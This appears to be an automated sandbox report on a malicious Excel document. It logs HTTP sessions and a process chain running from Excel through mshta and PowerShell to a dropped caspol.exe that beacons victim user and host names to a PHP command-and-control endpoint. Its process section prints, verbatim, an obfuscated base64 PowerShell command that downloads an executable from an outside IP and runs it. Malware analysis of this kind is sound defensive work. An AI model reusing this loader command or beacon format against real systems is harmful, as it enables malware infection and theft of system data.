                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    71192.168.2.224924094.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:58:07.027129889 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:58:07.032370090 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:58:07.903635025 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:58:07 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    72192.168.2.224924194.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:58:08.073318958 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:58:08.079653025 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:58:08.914391994 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:58:08 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    73192.168.2.224924294.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:58:09.070729971 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:58:09.075720072 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:58:09.790751934 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:58:09 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    74192.168.2.224924394.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:58:09.948055029 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:58:09.961206913 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:58:10.690216064 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:58:10 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    75192.168.2.224924494.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:58:10.836560011 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:58:10.842150927 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:58:11.686970949 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:58:11 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    76192.168.2.224924594.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:58:11.843614101 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:58:11.848536968 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:58:12.561392069 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:58:12 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    77192.168.2.224924694.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:58:12.733412027 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:58:12.738338947 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:58:13.441821098 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:58:13 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    78192.168.2.224924794.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:58:13.590063095 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:58:13.595288038 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:58:14.312865973 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:58:14 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    79192.168.2.224924894.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:58:14.443617105 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:58:14.448889017 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:58:15.160309076 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:58:15 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.2249163198.244.140.414433192C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-11-20 06:56:32 UTC386OUTGET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1
                                                                    Accept: */*
                                                                    UA-CPU: AMD64
                                                                    Accept-Encoding: gzip, deflate
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Host: provit.uk
                                                                    Connection: Keep-Alive
                                                                    2024-11-20 06:56:32 UTC468INHTTP/1.1 302 Found
                                                                    Content-Length: 120
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Date: Wed, 20 Nov 2024 06:56:32 GMT
                                                                    Location: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta
                                                                    Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                    Vary: Accept
                                                                    X-Content-Type-Options: nosniff
                                                                    X-Dns-Prefetch-Control: off
                                                                    X-Download-Options: noopen
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Xss-Protection: 0
                                                                    Connection: close
                                                                    2024-11-20 06:56:32 UTC120INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 34 33 2e 31 33 36 2f 78 61 6d 70 70 2f 73 77 6d 2f 73 77 2f 67 72 65 65 74 69 6e 67 77 69 74 68 67 72 65 61 74 74 68 69 67 6e 73 67 69 76 65 6e 62 61 63 6b 77 69 74 68 65 6e 74 69 72 65 70 72 6f 63 65 73 73 67 69 76 65 6e 6d 65 62 61 63 6b 2e 68 74 61
                                                                    Data Ascii: Found. Redirecting to http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.2249165198.244.140.414433492C:\Windows\System32\mshta.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-11-20 06:56:35 UTC410OUTGET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1
                                                                    Accept: */*
                                                                    Accept-Language: en-US
                                                                    UA-CPU: AMD64
                                                                    Accept-Encoding: gzip, deflate
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Host: provit.uk
                                                                    Connection: Keep-Alive
                                                                    2024-11-20 06:56:35 UTC468INHTTP/1.1 302 Found
                                                                    Content-Length: 120
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Date: Wed, 20 Nov 2024 06:56:35 GMT
                                                                    Location: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta
                                                                    Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                    Vary: Accept
                                                                    X-Content-Type-Options: nosniff
                                                                    X-Dns-Prefetch-Control: off
                                                                    X-Download-Options: noopen
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Xss-Protection: 0
                                                                    Connection: close
                                                                    2024-11-20 06:56:35 UTC120INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 34 33 2e 31 33 36 2f 78 61 6d 70 70 2f 73 77 6d 2f 73 77 2f 67 72 65 65 74 69 6e 67 77 69 74 68 67 72 65 61 74 74 68 69 67 6e 73 67 69 76 65 6e 62 61 63 6b 77 69 74 68 65 6e 74 69 72 65 70 72 6f 63 65 73 73 67 69 76 65 6e 6d 65 62 61 63 6b 2e 68 74 61
                                                                    Data Ascii: Found. Redirecting to http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.2249175198.244.140.414433192C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-11-20 06:57:05 UTC386OUTGET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1
                                                                    Accept: */*
                                                                    UA-CPU: AMD64
                                                                    Accept-Encoding: gzip, deflate
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Host: provit.uk
                                                                    Connection: Keep-Alive
                                                                    2024-11-20 06:57:05 UTC468INHTTP/1.1 302 Found
                                                                    Content-Length: 120
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Date: Wed, 20 Nov 2024 06:57:05 GMT
                                                                    Location: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta
                                                                    Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                    Vary: Accept
                                                                    X-Content-Type-Options: nosniff
                                                                    X-Dns-Prefetch-Control: off
                                                                    X-Download-Options: noopen
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Xss-Protection: 0
                                                                    Connection: close
                                                                    2024-11-20 06:57:05 UTC120INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 34 33 2e 31 33 36 2f 78 61 6d 70 70 2f 73 77 6d 2f 73 77 2f 67 72 65 65 74 69 6e 67 77 69 74 68 67 72 65 61 74 74 68 69 67 6e 73 67 69 76 65 6e 62 61 63 6b 77 69 74 68 65 6e 74 69 72 65 70 72 6f 63 65 73 73 67 69 76 65 6e 6d 65 62 61 63 6b 2e 68 74 61
                                                                    Data Ascii: Found. Redirecting to http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.2249179198.244.140.414433424C:\Windows\System32\mshta.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-11-20 06:57:10 UTC410OUTGET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1
                                                                    Accept: */*
                                                                    Accept-Language: en-US
                                                                    UA-CPU: AMD64
                                                                    Accept-Encoding: gzip, deflate
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Host: provit.uk
                                                                    Connection: Keep-Alive
                                                                    2024-11-20 06:57:10 UTC468INHTTP/1.1 302 Found
                                                                    Content-Length: 120
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Date: Wed, 20 Nov 2024 06:57:10 GMT
                                                                    Location: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta
                                                                    Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                    Vary: Accept
                                                                    X-Content-Type-Options: nosniff
                                                                    X-Dns-Prefetch-Control: off
                                                                    X-Download-Options: noopen
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Xss-Protection: 0
                                                                    Connection: close
                                                                    2024-11-20 06:57:10 UTC120INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 34 33 2e 31 33 36 2f 78 61 6d 70 70 2f 73 77 6d 2f 73 77 2f 67 72 65 65 74 69 6e 67 77 69 74 68 67 72 65 61 74 74 68 69 67 6e 73 67 69 76 65 6e 62 61 63 6b 77 69 74 68 65 6e 74 69 72 65 70 72 6f 63 65 73 73 67 69 76 65 6e 6d 65 62 61 63 6b 2e 68 74 61
                                                                    Data Ascii: Found. Redirecting to http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:01:56:08
                                                                    Start date:20/11/2024
                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                    Imagebase:0x13f4a0000
                                                                    File size:28'253'536 bytes
                                                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:4
                                                                    Start time:01:56:32
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\System32\mshta.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                    Imagebase:0x13f8b0000
                                                                    File size:13'824 bytes
                                                                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:01:56:36
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
                                                                    Imagebase:0x13f6f0000
                                                                    File size:443'392 bytes
                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:7
                                                                    Start time:01:56:38
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
                                                                    Imagebase:0x13f6f0000
                                                                    File size:443'392 bytes
                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:8
                                                                    Start time:01:56:42
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline"
                                                                    Imagebase:0x13f590000
                                                                    File size:2'758'280 bytes
                                                                    MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:9
                                                                    Start time:01:56:43
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37A5.tmp" "c:\Users\user\AppData\Local\Temp\i4ik0bio\CSCA15BDDDB4364D65A645793B6780D1C5.TMP"
                                                                    Imagebase:0x13fc70000
                                                                    File size:52'744 bytes
                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:11
                                                                    Start time:01:56:48
                                                                    Start date:20/11/2024
                                                                    Path:C:\Users\user\AppData\Roaming\caspol.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\caspol.exe"
                                                                    Imagebase:0xec0000
                                                                    File size:600'576 bytes
                                                                    MD5 hash:74061922F1E78C237A66D12A15A18181
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
